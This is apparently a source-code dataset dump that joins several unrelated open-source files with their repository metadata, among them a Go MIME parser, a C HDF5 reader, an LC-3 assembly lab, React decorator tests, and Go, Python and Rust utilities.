boundary := params["boundary"]
err = parseParts(root, reader, boundary)
if err != nil {
return nil, err
}
} else {
// Content is text or data, decode it
content, err := decodeSection(header.Get("Content-Transfer-Encoding"), reader)
if err != nil {
return nil, err
}
root.content = content
}
return root, nil
}
// parseParts recursively parses a mime multipart document.
func parseParts(parent *memMIMEPart, reader io.Reader, boundary string) error {
var prevSibling *memMIMEPart
// Loop over MIME parts
mr := multipart.NewReader(reader, boundary)
for {
// mrp is golang's built in mime-part
mrp, err := mr.NextPart()
if err != nil {
if err == io.EOF {
// This is a clean end-of-message signal
break
}
return err
}
if len(mrp.Header) == 0 {
// Empty header probably means the part didn't using the correct trailing "--"
// syntax to close its boundary. We will let this slide if this this the
// last MIME part.
if _, err := mr.NextPart(); err != nil {
if err == io.EOF || strings.HasSuffix(err.Error(), "EOF") {
// This is what we were hoping for
break
} else {
return fmt.Errorf("Error at boundary %v: %v", boundary, err)
}
}
return fmt.Errorf("Empty header at boundary %v", boundary)
}
ctype := mrp.Header.Get("Content-Type")
if ctype == "" {
return fmt.Errorf("Missing Content-Type at boundary %v", boundary)
}
mediatype, mparams, err := mime.ParseMediaType(ctype)
if err != nil {
return err
}
// Insert ourselves into tree, p is enmime's mime-part
p := NewMIMEPart(parent, mediatype)
p.header = mrp.Header
if prevSibling != nil {
prevSibling.nextSibling = p
} else {
parent.firstChild = p
}
prevSibling = p
// Figure out our disposition, filename
disposition, dparams, err := mime.ParseMediaType(mrp.Header.Get("Content-Disposition"))
if err == nil {
// Disposition is optional
p.disposition = disposition
p.fileName = DecodeHeader(dparams["filename"])
}
if p.fileName == "" && mparams["name"] != "" {
p.fileName = DecodeHeader(mparams["name"])
}
if p.fileName == "" && mparams["file"] != "" {
p.fileName = DecodeHeader(mparams["file"])
}
if p.charset == "" {
p.charset = mparams["charset"]
}
boundary := mparams["boundary"]
if boundary != "" {
// Content is another multipart
err = parseParts(p, mrp, boundary)
if err != nil {
return err
}
} else {
// Content is text or data, decode it
data, err := decodeSection(mrp.Header.Get("Content-Transfer-Encoding"), mrp)
if err != nil {
return err
}
p.content = data
}
}
return nil
}
// decodeSection attempts to decode the data from reader using the algorithm listed in
// the Content-Transfer-Encoding header, returning the raw data if it does not known
// the encoding type.
func decodeSection(encoding string, reader io.Reader) ([]byte, error) {
// Default is to just read input into bytes
decoder := reader
switch strings.ToLower(encoding) {
case "quoted-printable":
decoder = qprintable.NewDecoder(qprintable.WindowsTextEncoding, reader)
case "base64":
cleaner := NewBase64Cleaner(reader)
decoder = base64.NewDecoder(base64.StdEncoding, cleaner)
}
// Read bytes into buffer
buf := new(bytes.Buffer)
_, err := buf.ReadFrom(decoder)
if err != nil {
return nil, err
}
return buf.Bytes(), nil
}
| 27.22314 | 91 | 0.686703 | 3.125 |
5b3c51498621ede0a2e5fe424027b2d0f6bb763b | 4,270 | c | C | io/read_hdf5.c | Andrei-EPFL/FCFC | fdf69fc5d6b24bdd7fff2bcdf8998c6ecacabdd6 | [
"MIT"
] | null | null | null | io/read_hdf5.c | Andrei-EPFL/FCFC | fdf69fc5d6b24bdd7fff2bcdf8998c6ecacabdd6 | [
"MIT"
] | null | null | null | io/read_hdf5.c | Andrei-EPFL/FCFC | fdf69fc5d6b24bdd7fff2bcdf8998c6ecacabdd6 | [
"MIT"
] | null | null | null | #include "read_file.h"
#include "libast.h"
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <limits.h>
#include <ctype.h>
#include "hdf5.h"
static int read_col(hid_t group_id, char const *pos, real **data, hsize_t *num) {
const int ndims = 1;//H5Sget_simple_extent_ndims(data_space);
hsize_t dims[ndims];
hid_t dataset_id = 0, data_space = 0; /* identifiers */
/* Open an existing dataset. */
if (!(dataset_id = H5Dopen(group_id, pos, H5P_DEFAULT))) {
P_ERR("failed to open the dataset of column %s\n", pos);
//CLEAN_PTR;
return 1;
}
/* Get the dataspace of the dataset_id */
if (!(data_space = H5Dget_space(dataset_id))) {
P_ERR("Failed to get the data_space from the dataset of column %s\n", pos);
//CLEAN_PTR;
return 1;
}
if (H5Sget_simple_extent_dims(data_space, dims, NULL) < 0) {
P_ERR("There are no dimensions in the dataset\n");
//CLEAN_PTR;
return 1;
}
*num = dims[0];
if (!(*data = malloc(sizeof(real) * dims[0]))) {
P_ERR("failed to allocate memory the column\n");
return 1;
}
/* Read the dataset. */
if (H5Dread(dataset_id, H5T_REAL, H5S_ALL, H5S_ALL, H5P_DEFAULT, *data) < 0) {
P_ERR("failed to read from the dataset of column %s\n", pos);
return 1;
}
/* Close the dataset. */
if (H5Dclose(dataset_id) < 0) {
P_ERR("failed to close the dataset of column %s\n", pos);
return 1;
}
return 0;
}
int read_hdf5_data(const char *fname, const char *groupname, char *const *pos, const char *wt, const char *sel,
DATA **data, size_t *num, const int verb) {
hid_t file_id = 0, group_id = 0;
DATA *tmp;
real *datax = NULL, *datay = NULL, *dataz = NULL;
hsize_t dimx, dimy, dimz;
size_t index = 0;
/* Open an existing file. */
if (!(file_id = H5Fopen(fname, H5F_ACC_RDONLY, H5P_DEFAULT))) {
P_ERR("Failed to open the HDF5 file %s\n", fname);
//CLEAN_PTR;
return FCFC_ERR_FILE;
}
/* Open an existing group. */
if (!(group_id = H5Gopen(file_id, groupname, H5P_DEFAULT))) {
P_ERR("failed to open the group %s\n", groupname);
//CLEAN_PTR;
return FCFC_ERR_FILE;
}
/* Read the columns */
if (read_col(group_id, pos[0], &datax, &dimx)) {
P_ERR("failed to read the column %s\n", pos[0]);
return 1;
}
if (read_col(group_id, pos[1], &datay, &dimy)) {
P_ERR("failed to read the column %s\n", pos[1]);
return 1;
}
if (read_col(group_id, pos[2], &dataz, &dimz)) {
P_ERR("failed to read the column %s\n", pos[2]);
return 1;
}
/* Check dimensions of the columns */
if ((dimx != dimy) || (dimy != dimz) || (dimz != dimx)) {
P_ERR("the sizes of the columns are not compatible\n");
return 1;
}
/* Allocate memory for data, a tmp variable */
if (!(tmp = malloc(dimx * sizeof(DATA)))) {
P_ERR("failed to allocate memory for the data\n");
//CLEAN_PTR;
return FCFC_ERR_MEMORY;
}
*num = dimx;
#ifdef OMP
#pragma omp parallel for
#endif
for (index = 0; index < dimx; index ++) {
tmp[index].x[0] = datax[index];
tmp[index].x[1] = datay[index];
tmp[index].x[2] = dataz[index];
}
#ifdef FCFC_DATA_WEIGHT
real *weight = NULL;
hsize_t dimw;
if (wt) {
if (read_col(group_id, wt, &weight, &dimw)) {
P_ERR("failed to read the column %s\n", pos[2]);
return 1;
}
}
if (weight && (dimx == dimw)) {
#ifdef OMP
#pragma omp parallel for
#endif
for (index = 0; index < dimx; index ++) {
tmp[index].w = weight[index];
}
}
else {
#ifdef OMP
#pragma omp parallel for
#endif
for (index = 0; index < dimx; index ++) {
tmp[index].w = 1;
}
}
#endif
*data = tmp;
/* Close the group. */
if (H5Gclose(group_id) < 0) {
P_ERR("failed to close the group of the HDF5 file\n");
}
/* Close the file. */
if (H5Fclose(file_id) < 0) {
P_ERR("failed to close the HDF5 file\n");
}
return 0;
} | 26.855346 | 111 | 0.559016 | 3.015625 |
a243c32bd2afc2eeb277de62059676cf64718f4d | 4,218 | asm | Assembly | Labs/Lab6/lab06_ex1.asm | ptr2578/CS61 | 682dccd6b986f383120a4612eb7e7a2d1e3cfa3f | [
"BSD-3-Clause"
] | 1 | 2019-01-01T23:31:22.000Z | 2019-01-01T23:31:22.000Z | Labs/Lab6/lab06_ex1.asm | ptr2578/CS61 | 682dccd6b986f383120a4612eb7e7a2d1e3cfa3f | [
"BSD-3-Clause"
] | null | null | null | Labs/Lab6/lab06_ex1.asm | ptr2578/CS61 | 682dccd6b986f383120a4612eb7e7a2d1e3cfa3f | [
"BSD-3-Clause"
] | null | null | null | ;=================================================
; Name: Sungho Ahn
; Email: [email protected]
; GitHub username: ptr2578
;
; Lab: lab 6
; Lab section: B21
; TA: Jason Goulding
;=================================================
.ORIG x3000
;--------------
; Instructions
;--------------
LD R1, ARRAY_PTR ; Load address of Array into R1
ADD R0, R0, #1 ; Put number 1 in R0
ADD R3, R3, #10 ; R3 used for loop counter
;-------------
; CODE BEGINS
;-------------
InputLoop ; BRANCH InputLoop/ Loop begins
STR R0, R1, #0 ; Stores the number in R0 into the array
ADD R0, R0, R0 ; Multiply the value in R0 by 2 (2^n)
ADD R1, R1, #1 ; Move to next data slot
ADD R3, R3, #-1 ; Decrement the loop counter
BRz InputLoopEnd ; If counter becomes 0, out the loop
BR InputLoop ; Back to top of the loop
InputLoopEnd ; BRANCH InputLoopEnd
;---------------------------------------------------------------------------
AND R1, R1, #0 ; Clear R1 for next use
ADD R1, R1, #1 ; R1 holds number 1 for comparison purpose
ADD R3, R3, #10 ; Loop counter for array loop
LD R6, ARRAY_PTR ; Load the address of the array into R6
ArrayLoop ; BRANCH ArrayLoop / Loop begins
LDR R2, R6, #0 ; Load direct the value of the array into R2
AND R4, R4, #0 ; Loop counter for Hex loop
AND R0, R0, #0 ; Clear R0 for next use
LD R0, Printb ; Load R0 with b
OUT ; Print character b
HexLoop ; BRANCH HexLoop
ADD R4, R4, #1 ; Increment hex-loop counter by 1 every loop
AND R0, R0, #0 ; Clear R0 for next use
JSR SUB_PRINT_16BINARY ; Jump to subroutine SUB_PRINT_16BINARY
SpaceLoop ; BRANCH SpaceLoop
AND R5, R5, #0 ; Clear R5 for next use
ADD R5, R4, #-4 ; Check to see if the loop is 4th count
BRz isSpace ; Go to isSpace to print space out if sum = 0
ADD R5, R4, #-8 ; Check to see if the loop is 8th count
BRz isSpace ; Go to isSpace to print space out if sum = 0
ADD R5, R4, #-12 ; Check to see if the loop is 12th count
BRz isSpace ; Go to isSpace to print space out if sum = 0
BR HexLoopCheck ; Skip to BRANCH LoopCheck
isSpace ; BRANCH isSpace
AND R0, R0, #0 ; Clear R0 for next use
LD R0, PrintSpace ; Load space character in R0
OUT ; Prints space
HexLoopCheck ; BRANCH LoopCheck
AND R0, R0, #0 ; Clear R0 for next use
ADD R0, R4, #-16 ; Loop continues until counter becomes zero
BRz HexLoopEnd
BR HexLoop
HexLoopEnd ; BRANCH HexLoopEnd
AND R0, R0, #0 ; Clear R0 for next use
LEA R0, NEWLINE ; Load new line in R0
PUTS ; Prints new line
ADD R6, R6, #1 ; Move to the next data in the array
ADD R3, R3, #-1 ; Decrement the array-Loop counter
BRz ArrayLoopEnd ; Out the array-loop if zero
BR ArrayLoop ; Back to the top of the array-loop if positive
ArrayLoopEnd ; BRANCH ArrayLoopEnd
HALT
;------
; Data
;------
ARRAY_PTR .FILL x4000 ; Address of the array
Printb .FILL x0062 ; ASCII character b
PrintSpace .FILL x0020 ; Space
NEWLINE .STRINGZ "\n" ; New line
;-------------
; Remote data
;-------------
.ORIG x4000
ARRAY .BLKW #10 ; Array with 10 values
;---------------------------------------------------------
; Subroutine: PRINT_16BINARY
; Parameter: R0, R2
; Postcondition: The subroutine will take MSB and compare
; with 1 and print its bin value. 0 or 1
; Return value: None
;---------------------------------------------------------
.ORIG x3200
SUB_PRINT_16BINARY ; BRANCH SUB_PRINT_16BINARY
ST R7, BACKUP_R7_3200 ; Backup R7
ADD R0, R2, R1 ; Compare MSB with 1
BRnz isOne ; If MSB is 1, go to branch isOne
isZero ; BRANCH isZero
AND R0, R0, #0 ; Clear R0 for next use
LD R0, PrintZero ; Load R0 with 0
OUT ; Prints zero
ADD R2, R2, R2 ; Shift bits left
BR EndSubroutine ; Skip to SpaceLoop
isOne ; BRANCH isOne
AND R0, R0, #0 ; Clear R0 for next use
LD R0, PrintOne ; Load R0 with 1
OUT ; Prints one
ADD R2, R2, R2 ; Shift bits left
EndSubroutine ; BRANCH EndSubroutine
LD R7, BACKUP_R7_3200 ; Restore R7
RET ; Return to address R7
;-----------------
; Subroutine Data
;-----------------
BACKUP_R7_3200 .BLKW #1
PrintZero .FILL x0030 ; ASCII character 0
PrintOne .FILL x0031 ; ASCII character 1
;----------------
; END of Program
;----------------
.END | 29.089655 | 76 | 0.613798 | 3.421875 |
502c0aad13ef2fe5f62da67fe6ccdec547ae174b | 3,192 | go | Go | go/src/fblib/edge.go | dominichamon/force-bundles | 3bc542ef7d471a3541f58e9458473d5b0e3839fd | [
"Apache-2.0"
] | null | null | null | go/src/fblib/edge.go | dominichamon/force-bundles | 3bc542ef7d471a3541f58e9458473d5b0e3839fd | [
"Apache-2.0"
] | null | null | null | go/src/fblib/edge.go | dominichamon/force-bundles | 3bc542ef7d471a3541f58e9458473d5b0e3839fd | [
"Apache-2.0"
] | 1 | 2020-11-15T20:12:29.000Z | 2020-11-15T20:12:29.000Z | package fblib
import (
"fmt"
"math"
)
const (
K = 0.01
)
type Edge struct {
forces []Vector
velocities []Vector
vertices []Point
}
func NewEdge(p0, p1 Point) *Edge {
return &Edge{forces: []Vector{}, velocities: []Vector{}, vertices: []Point{p0, p1},}
}
func (e *Edge) compatibility(q Edge) float64 {
delta_p := e.vertices[len(e.vertices)-1].Sub(e.vertices[0])
delta_q := q.vertices[len(q.vertices)-1].Sub(q.vertices[0])
len_p := delta_p.Length()
len_q := delta_q.Length()
// angle
Ca := math.Abs(delta_p.Dot(delta_q) / (len_p * len_q))
// scale
len_avg := (len_p + len_q) / 2.0
Cs := 2.0 / (len_avg*math.Min(len_p, len_q) + math.Max(len_p, len_q)/len_avg)
// position
mid_p := e.vertices[len(e.vertices)/2]
mid_q := q.vertices[len(q.vertices)/2]
Cp := len_avg / (len_avg + mid_p.Sub(mid_q).Length())
// visibility
// TODO
Cv := 1.0
return Ca * Cs * Cp * Cv
}
func (e *Edge) Subdivide(segments int) {
delta := e.vertices[len(e.vertices)-1].Sub(e.vertices[0])
subdelta := delta.Scale(1.0 / float64(segments))
newVertices := make([]Point, segments+1)
newVertices[segments] = e.vertices[len(e.vertices)-1]
for i := 0; i < segments; i++ {
newVertices[i] = e.vertices[0].Add(subdelta.Scale(float64(i)))
}
e.vertices = newVertices
e.forces = make([]Vector, len(e.vertices))
e.velocities = make([]Vector, len(e.vertices))
if len(e.vertices) != len(e.forces) || len(e.vertices) != len(e.velocities) {
fmt.Println("WTF0")
}
}
func (e *Edge) ClearForces() {
for i, _ := range e.forces {
e.forces[i] = Vector{0, 0}
}
}
func (e *Edge) AddSpringForces() {
if len(e.vertices) != len(e.forces) || len(e.vertices) != len(e.velocities) {
fmt.Println("WTF1")
}
for i := 1; i < len(e.vertices)-1; i++ {
// spring forces
delta0 := e.vertices[i-1].Sub(e.vertices[i])
delta1 := e.vertices[i].Sub(e.vertices[i+1])
// TODO: shouldn't this be the difference from the original length?
delta0_len := delta0.Length()
delta1_len := delta1.Length()
delta0_dir := delta0.Scale(1.0 / delta0_len)
delta1_dir := delta1.Scale(1.0 / delta1_len)
Fs0 := delta0_dir.Scale(K * delta0_len)
Fs1 := delta1_dir.Scale(K * delta1_len)
e.forces[i] = e.forces[i].Add(Fs0).Add(Fs1)
}
}
func (e *Edge) AddElectrostaticForces(q Edge) {
if len(e.vertices) != len(e.forces) || len(e.vertices) != len(e.velocities) {
fmt.Println("WTF2")
}
compat := e.compatibility(q)
for i := 1; i < len(e.vertices)-1; i++ {
// electrostatic forces
delta_e := e.vertices[i].Sub(q.vertices[i])
delta_e_len := delta_e.Length()
delta_e_dir := delta_e.Scale(1.0 / delta_e_len)
Fe := delta_e_dir.Scale(1.0 / delta_e_len)
e.forces[i] = e.forces[i].Add(Fe.Scale(compat))
}
}
func (e *Edge) UpdatePositions(dt float64) bool {
if len(e.vertices) != len(e.forces) || len(e.vertices) != len(e.velocities) {
fmt.Println("WTF3")
}
moved := false
for i, _ := range e.vertices {
// assume mass == 1
// Euler integration (blech)
e.velocities[i] = e.velocities[i].Add(e.forces[i].Scale(dt))
delta_p := e.velocities[i].Scale(dt)
e.vertices[i] = e.vertices[i].Add(delta_p)
if delta_p.Length() > EPSILON {
moved = true
}
}
return moved
}
| 24.744186 | 85 | 0.640664 | 3.484375 |
9c01205d252ee1a4634218eb8952a31f3a7fab86 | 3,906 | js | JavaScript | test/utils.spec.js | lake-effect/react-decoration | a7322bd66eaaffb6376e76cf3e864486904c8fed | [
"MIT"
] | 679 | 2016-09-28T18:15:21.000Z | 2022-02-06T21:21:11.000Z | test/utils.spec.js | lake-effect/react-decoration | a7322bd66eaaffb6376e76cf3e864486904c8fed | [
"MIT"
] | 13 | 2016-10-22T02:45:35.000Z | 2020-03-27T12:44:43.000Z | test/utils.spec.js | lake-effect/react-decoration | a7322bd66eaaffb6376e76cf3e864486904c8fed | [
"MIT"
] | 34 | 2016-09-27T21:06:32.000Z | 2021-07-17T02:44:54.000Z | import expect from 'expect';
import React from 'react';
import ReactTestUtils from 'react-dom/test-utils';
import {
validateClass,
validateFunction,
validateClassAndFunction,
} from '../src/utils/validators';
import getEventPreprocessor from '../src/utils/getEventPreprocessor';
import wrapLifecycleMethod from '../src/utils/wrapLifecycleMethod';
describe('utils', () => {
it('should get a decorator for given events', () => {
expect(getEventPreprocessor).toThrow('Invalid method list');
const prevent = getEventPreprocessor('prevent', 'preventDefault');
expect(prevent(() => false)).toExist();
const unknownEventPrepocessor = getEventPreprocessor('unknown', 'foo');
expect(unknownEventPrepocessor(() => false)).toExist();
const invalidEventFunc = getEventPreprocessor('invalidEventFunc', 'foo', undefined, null);
// eslint-disable-next-line
class Input extends React.Component {
@invalidEventFunc
onChange() {
// do nothing
}
render() {
return (
<input
onChange={this.onChange}
/>
);
}
}
const rendered = ReactTestUtils.renderIntoDocument(<Input />);
const input = ReactTestUtils.findRenderedDOMComponentWithTag(rendered, 'input');
expect(() => ReactTestUtils.Simulate.change(input)).toNotThrow();
});
it('should validate class', () => {
expect(() => validateClass(class Foo { })).toNotThrow();
expect(() => validateClass(43)).toThrow();
expect(() => validateClass(undefined)).toThrow();
expect(
() => validateClass(43, 'foo')
).toThrow('@foo decorator can only be applied to class not: number');
});
it('should validate function', () => {
expect(() => validateFunction(() => 43)).toNotThrow();
expect(() => validateFunction(43)).toThrow();
expect(() => validateFunction(undefined)).toThrow();
expect(
() => validateFunction(43, 'foo')
).toThrow('@foo decorator can only be applied to methods not: number');
});
it('should validate class and function', () => {
expect(() => validateClassAndFunction(() => 43)).toNotThrow();
expect(() => validateClassAndFunction(class Foo { })).toNotThrow();
expect(() => validateClassAndFunction(43)).toThrow();
expect(() => validateClassAndFunction(undefined)).toThrow();
expect(
() => validateClassAndFunction(43, 'foo')
).toThrow('@foo decorator can only be applied to class and methods not: number');
});
it('should wrap a lifecycle method', (done) => {
@wrapLifecycleMethod('componentDidUpdate',
function componentDidUpdateWrapper(prevProps, prevState) {
expect(prevProps).toEqual({});
expect(prevState).toEqual({});
expect(this.foo).toEqual('bar');
return 'foo';
}
)
// eslint-disable-next-line
class DivWithoutUserMethod extends React.Component {
constructor(...params) {
super(...params);
expect(this.componentDidUpdate({}, {})).toEqual('foo');
}
foo = 'bar'
render() {
return (
<div />
);
}
}
@wrapLifecycleMethod('componentDidUpdate', (prevProps, prevState, res) => {
expect(prevProps).toEqual({});
expect(prevState).toEqual({});
expect(res).toEqual(true);
return 'foo';
})
// eslint-disable-next-line
class DivWithUserMethod extends React.Component {
constructor(...params) {
super(...params);
expect(this.componentDidUpdate({}, {})).toEqual('foo');
done();
}
componentDidUpdate() {
expect(this.foo).toEqual('bar');
return true;
}
foo = 'bar';
render() {
return (
<div />
);
}
}
ReactTestUtils.renderIntoDocument(<DivWithoutUserMethod />);
ReactTestUtils.renderIntoDocument(<DivWithUserMethod />);
});
});
| 30.515625 | 94 | 0.616743 | 3.125 |
3d052dd80b40866b1a5f2797e995992515d13b8d | 2,149 | go | Go | pkg/cli/v0/loadbalancer/backends.go | MagnusS/infrakit | 350060829e83c2ff3f10f2ce9af3167590e9b59e | [
"Apache-2.0"
] | 1 | 2021-07-01T05:28:49.000Z | 2021-07-01T05:28:49.000Z | pkg/cli/v0/loadbalancer/backends.go | MagnusS/infrakit | 350060829e83c2ff3f10f2ce9af3167590e9b59e | [
"Apache-2.0"
] | null | null | null | pkg/cli/v0/loadbalancer/backends.go | MagnusS/infrakit | 350060829e83c2ff3f10f2ce9af3167590e9b59e | [
"Apache-2.0"
] | null | null | null | package loadbalancer
import (
"fmt"
"io"
"os"
"github.com/docker/infrakit/pkg/cli"
"github.com/docker/infrakit/pkg/spi/instance"
"github.com/spf13/cobra"
)
// Backends returns the describe command
func Backends(name string, services *cli.Services) *cobra.Command {
backends := &cobra.Command{
Use: "backends",
Short: "Loadbalancer backends",
}
ls := &cobra.Command{
Use: "ls",
Short: "List loadbalancer backends",
}
register := &cobra.Command{
Use: "add <instance.ID> ...",
Short: "Register backends []instance.ID",
RunE: func(cmd *cobra.Command, args []string) error {
if len(args) != 1 {
cmd.Usage()
os.Exit(1)
}
l4, err := services.Scope.L4(name)
if err != nil {
return nil
}
cli.MustNotNil(l4, "L4 not found", "name", name)
ids := []instance.ID{}
for _, a := range args {
ids = append(ids, instance.ID(a))
}
res, err := l4.RegisterBackends(ids)
fmt.Println(res)
return err
},
}
deregister := &cobra.Command{
Use: "rm <instance.ID> ...",
Short: "Deregister backends []instance.ID",
RunE: func(cmd *cobra.Command, args []string) error {
if len(args) != 1 {
cmd.Usage()
os.Exit(1)
}
l4, err := services.Scope.L4(name)
if err != nil {
return nil
}
cli.MustNotNil(l4, "L4 not found", "name", name)
ids := []instance.ID{}
for _, a := range args {
ids = append(ids, instance.ID(a))
}
res, err := l4.DeregisterBackends(ids)
fmt.Println(res)
return err
},
}
backends.AddCommand(ls, register, deregister)
ls.Flags().AddFlagSet(services.OutputFlags)
ls.RunE = func(cmd *cobra.Command, args []string) error {
if len(args) != 0 {
cmd.Usage()
os.Exit(1)
}
l4, err := services.Scope.L4(name)
if err != nil {
return nil
}
cli.MustNotNil(l4, "L4 not found", "name", name)
list, err := l4.Backends()
if err != nil {
return err
}
return services.Output(os.Stdout, list,
func(w io.Writer, v interface{}) error {
fmt.Printf("%-20v\n", "INSTANCE ID")
for _, r := range list {
fmt.Printf("%-20v\n", r)
}
return nil
})
}
return backends
}
| 20.084112 | 67 | 0.604467 | 3.109375 |
9edd57faa5df8c4cb4f693a459e2342b93f2e60c | 1,816 | rs | Rust | src/service/places/request.rs | timeanddate/libtad-rs | c4a3bd4c80780196c17358e7a5b4e39182d857a9 | [
"MIT"
] | null | null | null | src/service/places/request.rs | timeanddate/libtad-rs | c4a3bd4c80780196c17358e7a5b4e39182d857a9 | [
"MIT"
] | null | null | null | src/service/places/request.rs | timeanddate/libtad-rs | c4a3bd4c80780196c17358e7a5b4e39182d857a9 | [
"MIT"
] | null | null | null | use serde::Serialize;
#[derive(Default, Serialize)]
/// Places API request.
///
/// Request is validated when supplied to the client.
///
/// Example:
/// ```
/// use libtad_rs::{
/// ServiceClient,
/// service::places::PlacesRequest,
/// };
///
/// let client = ServiceClient::new("access_key".into(), "secret_key".into());
/// let request = PlacesRequest::new()
/// .with_placeid("158")
/// .set_lang("de")
/// .set_geo(false);
///
/// let response = client.get_places(&request);
/// ```
pub struct PlacesRequest {
placeid: Option<Vec<String>>,
query: Option<String>,
qlimit: Option<u8>,
lang: Option<String>,
geo: Option<u8>,
}
impl PlacesRequest {
/// Start building a new request.
pub fn new() -> Self {
Default::default()
}
/// Set the placeid for the request.
pub fn with_placeid(mut self, placeid: impl Into<String>) -> Self {
if let Some(ref mut placeids) = self.placeid {
placeids.push(placeid.into());
} else {
self.placeid.insert(vec![placeid.into()]);
}
self
}
/// Set the query for the request.
pub fn set_query(mut self, query: impl Into<String>) -> Self {
self.query.insert(query.into());
self
}
/// Set the maximum number of query results to be returned.
pub fn set_qlimit(mut self, qlimit: u8) -> Self {
self.qlimit.insert(qlimit);
self
}
/// Set the request language for the request.
pub fn set_lang(mut self, lang: impl Into<String>) -> Self {
self.lang.insert(lang.into());
self
}
/// Toggle whether to return longitude and latitude for the geo object.
pub fn set_geo(mut self, enable: bool) -> Self {
self.geo.insert(enable.into());
self
}
}
| 23.894737 | 78 | 0.585352 | 3.15625 |
7013b4e6a1fb00a3c474d634a4aea75c55a30781 | 1,784 | go | Go | transpose/transpose.go | charlievieth/utils | 57f65151ac366ad3d0d4389a1f56e003ba4d142c | [
"MIT"
] | 2 | 2018-10-24T10:36:28.000Z | 2021-07-18T15:51:15.000Z | transpose/transpose.go | charlievieth/utils | 57f65151ac366ad3d0d4389a1f56e003ba4d142c | [
"MIT"
] | null | null | null | transpose/transpose.go | charlievieth/utils | 57f65151ac366ad3d0d4389a1f56e003ba4d142c | [
"MIT"
] | null | null | null | package main
import (
"encoding/csv"
"encoding/json"
"flag"
"fmt"
"os"
"path/filepath"
"runtime"
"text/tabwriter"
)
var LineCount int
var MaxLength int
func init() {
flag.IntVar(&LineCount, "n", 2, "Number of lines to transpose")
flag.IntVar(&MaxLength, "l", -1, "Max line length, -1 means no max length")
}
func main() {
flag.Parse()
if flag.NArg() == 0 {
Fatal("USAGE: [OPTIONS] FILENAME")
}
if LineCount <= 0 {
Fatal("lines argument '-n' must be greater than 0")
}
f, err := os.Open(flag.Arg(0))
if err != nil {
Fatal(err)
}
defer f.Close()
r := csv.NewReader(f)
var lines [][]string
for i := 0; i < LineCount; i++ {
a, err := r.Read()
if err != nil {
Fatal(err)
}
lines = append(lines, a)
}
w := tabwriter.NewWriter(os.Stdout, 0, 0, 4, ' ', 0)
for j := range lines[0] {
for i := range lines {
// TODO: don't trim the first column
line := lines[i][j]
if n := MaxLength; n > 0 && len(line) > n {
if n > 6 {
line = line[:n-len("...")] + "..."
} else {
line = line[:n]
}
}
if i == 0 {
fmt.Fprintf(w, "%s:", line)
} else {
fmt.Fprintf(w, "\t%s", line)
}
}
fmt.Fprint(w, "\n")
}
if err := w.Flush(); err != nil {
Fatal(err)
}
}
func PrintJSON(v interface{}) {
enc := json.NewEncoder(os.Stdout)
enc.SetIndent("", " ")
if err := enc.Encode(v); err != nil {
Fatal(err)
}
}
func Fatal(err interface{}) {
if err == nil {
return
}
var s string
if _, file, line, ok := runtime.Caller(1); ok && file != "" {
s = fmt.Sprintf("Error (%s:%d)", filepath.Base(file), line)
} else {
s = "Error"
}
switch err.(type) {
case error, string, fmt.Stringer:
fmt.Fprintf(os.Stderr, "%s: %s\n", s, err)
default:
fmt.Fprintf(os.Stderr, "%s: %#v\n", s, err)
}
os.Exit(1)
}
| 18.778947 | 76 | 0.555493 | 3.453125 |
0cfa89782c8d3290c0c6ceba7319a0449a110fed | 2,585 | py | Python | model/embeddings.py | johnnytorres/crisis_conv_crosslingual | a30e762007e08190275bdd83af3c0bbc717fb516 | [
"MIT"
] | null | null | null | model/embeddings.py | johnnytorres/crisis_conv_crosslingual | a30e762007e08190275bdd83af3c0bbc717fb516 | [
"MIT"
] | null | null | null | model/embeddings.py | johnnytorres/crisis_conv_crosslingual | a30e762007e08190275bdd83af3c0bbc717fb516 | [
"MIT"
] | 1 | 2019-12-03T00:29:14.000Z | 2019-12-03T00:29:14.000Z | import os
import logging
import argparse
import numpy as np
import tensorflow as tf
from keras_preprocessing.text import Tokenizer
from tqdm import tqdm
from data import DataLoader
class EmbeddingsBuilder:
def __init__(self, args):
logging.info('initializing...')
self.args = args
self.dataset = DataLoader(self.args)
self.embeddings_path = args.embeddings_path
self.small_embeddings_path = os.path.splitext(self.embeddings_path)[0] + '_small.vec'
logging.info('initializing...[ok]')
def build_embedding(self, vocab_dict):
"""
Load embedding vectors from a .txt file.
Optionally limit the vocabulary to save memory. `vocab` should be a set.
"""
num_words = len(vocab_dict)
num_found = 0
with open(self.small_embeddings_path, 'w') as out_file:
with tf.gfile.GFile(self.embeddings_path) as f:
header =next(f)
num_embeddings, embeddings_dim = header.split(' ')
num_embeddings = int(num_embeddings)
out_file.write(header)
for _, line in tqdm(enumerate(f), 'loading embeddings', total=num_embeddings):
tokens = line.rstrip().split(" ")
word = tokens[0]
if word in vocab_dict:
num_found += 1
out_file.write(line)
tf.logging.info("Found embeddings for {} out of {} words in vocabulary".format(num_found, num_words))
def run(self):
self.dataset.load()
X = self.dataset.X_train_labeled['moment'].values
X = np.append(X, self.dataset.X_train_unlabeled['moment'].values, axis=0)
X = np.append(X, self.dataset.X_test['moment'].values, axis=0)
tokenizer = Tokenizer()
tokenizer.fit_on_texts(X)
self.build_embedding(tokenizer.word_index)
if __name__ == '__main__':
logging.basicConfig(format='%(asctime)s %(message)s', level=logging.DEBUG)
logging.info('initializing task...')
parser = argparse.ArgumentParser()
parser.add_argument('--data-dir', default='data/claff-happydb')
parser.add_argument('--embeddings-path', type=str, default=None)
parser.add_argument('--num-unlabeled', type=int, default=1000)
parser.add_argument('--use-allfeats', action='store_true', default=False)
parser.add_argument('--predict', action='store_true', default=True)
builder = EmbeddingsBuilder(args=parser.parse_args())
builder.run()
logging.info('task finished...[ok]')
| 31.91358 | 109 | 0.635977 | 3.265625 |
75e147ff08d031c15b62d14418d43f760e0e14c9 | 2,456 | rs | Rust | src/main.rs | MerlinDMC/noderole | 7d90012e597502f2623c333f775f3111585b51cc | [
"Apache-2.0",
"MIT"
] | null | null | null | src/main.rs | MerlinDMC/noderole | 7d90012e597502f2623c333f775f3111585b51cc | [
"Apache-2.0",
"MIT"
] | null | null | null | src/main.rs | MerlinDMC/noderole | 7d90012e597502f2623c333f775f3111585b51cc | [
"Apache-2.0",
"MIT"
] | null | null | null | use clap::{crate_name, AppSettings, Parser};
use figment::{
providers::{Format, Yaml},
Figment,
};
use k8s_openapi::api::core::v1::Node;
use k8s_openapi::apimachinery::pkg::apis::meta::v1::ObjectMeta;
use kube::api::{Api, Patch, PatchParams};
use kube::Client;
use serde::Deserialize;
use std::collections::BTreeMap;
#[derive(Parser)]
#[clap(author, version, about, long_about = None)]
#[clap(global_setting(AppSettings::PropagateVersion))]
